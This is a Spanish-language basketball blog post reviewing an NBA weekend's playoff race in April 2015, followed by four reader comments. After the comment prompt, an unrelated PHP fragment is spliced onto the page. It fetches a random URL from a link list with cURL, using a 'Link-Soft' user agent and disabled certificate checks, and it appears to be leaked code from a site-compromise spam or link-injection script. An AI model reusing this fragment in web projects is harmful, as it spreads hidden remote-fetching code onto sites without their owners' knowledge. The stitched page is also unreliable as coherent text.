Informe Fin de Semana: La insoportable levedad del ser… en playoffs

13 de April de 2015 por TheDeerHunter

Momentos de gran incertidumbre en la lucha por el título. También en otros menesteres… llamadme idiota, pero si de mi dependiese el MVP se lo llevaba Harden. Para muestra el botón de anoche en una banda como la que comanda… En el Oeste un día eres 2º y al siguiente, madrugas sexto.

Los highlights del viernes dicen que Pelicans y Thunders se mantienen en la pomada. Destroza a Suns y Kings en casa, respectivamente. El verdadero coco, lo Spurs, volvieron a doblegar a los Rockets durante la misma semana en lo que perfectamente supondría el cruce en primera ronda. Los Grizzlies trataron eventualmente de resistir el paso de los campeones, con una sufrida victoria por un punto en Salt Lake City. Los Thunder ganaron a Kings pero no les dio para volver a plaza de playoffs, pues los Pelicans hicieron lo propio ante Phoenix.

Con la clasificación en la mano también tenía emoción en el Este. Los Pacers cumplieron en Detroit, pero tanto Celtics, ganando en Cleveland, como Nets, ante Wizards sacaron sus compromisos adelante y siguen cerrándoles el paso. Los Hawks mataron todas las esperanzas de que los Hornets vean postemporada este año.

Top 10 viernes

El sábado les tocó a los Grizzlies caer dramáticamente en la clasificación con su derrota ante Clippers y, con Gasol saliendo del partido por un esguince. La jornada no dio excesivamente de si… se mantenía el pulso entre Raptors, que mataron a Miami, y Chicago que doblegaron a Sixers con un destacado partido de Rose. Vimos un bonito duelo entre Curry y LaVine que se lo llevó, lógicamente, el Warrior y la sorpresa de la noche la dieron los Jazz ante Portland.

Top 10 sábado

El domingo la situación se puso muy desesperada para algunos implicados. Los Thunder no pudieron con los Pacers a pesar de los 54 puntazos de Westbrook quien, para colmo, se perderá el próximo partido por sanción motivada por su 16ª técnica. Impotentes veían como los Pelicans parecían doblegar a los Rockets pero Harden volvió a ponerse el traje de MVP para salvar a sus excompañeros. Los Spurs siguieron a lo suyo ante Suns.

En la cola del Este los Celtics le endosaron casi 40 puntos de diferencia a los Cavs en modo descanso, igual que los Pistons a los desangelados Hornets; los Nets tropezaron, esta vez sí, en Milwaukee aunque mantienen la octava plaza; y los Wizards doblegaron a los Hawks también con el modo rotación puesto.

Top 10 domingo

Imágenes | AP Photos / Getty Images

Comenta

4 comentarios a esta entrada

  1. luismi_vallecas dice:
    #1

    Increíble lo poco que queda de temporada regular. No recuerdo tanta igualdad a falta de 2-3 partidos desde que sigo la NBA. En el Oeste, del segundo al sexto puesto solo está decidido el cuarto puesto de Portland por la absurda regla de que el campeón de división quedará cuarto como poco. Clipps, Memphis y Houston tienen el mismo balance (54-26) y San Antonio solo tiene una victoria más (55-26). Por la cola, batalla tremenda entre OKC y Pellies, apuesto por estos últimos, con partidos más asequibles en principio que Oklahoma. En el Este más de lo mismo, con tres equipos a cara de perro para dos puestos. En un principio, los Celtics parten con ventaja respecto a Nets y Pacers

      Citar

  2. Tobal dice:
    #2

    Ojalá se metan los Pelicans,tienen mucho mérito lo que están haciedo,siempre en el complicado Oeste,dependen de ellos mismos,por otra parte en el Este,también hay emoción,los Celtics lo tienen casi hecho,Miami casi eliminado,vaya sorpresa la suya y entre Nets y Pacers,cualquier cosa puede pasar,se nos presentan unos grandes play offs,sin lugar a dudas ! VIVA EL BALONCESTO !

      Citar

  3. Ruxixón dice:
    #3

    Le han quitado la técnica a Westbrook que suponía su ausencia esta noche,en fin…

      Citar

  4. franitis dice:
    #4

    ¡Celtics clasificados! Tras la derrota de Nets ayer, los Celtics se clasifican por la ventaja de partidos directos con estos. A Indiana le quedan Wizards y Grizzlies, mientras que a Brooklyn solo le quedan los Magic. A priori los Nets son los mejor posicionados, aunque me gustaría que entrase Indiana, tras la recuperación de George.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>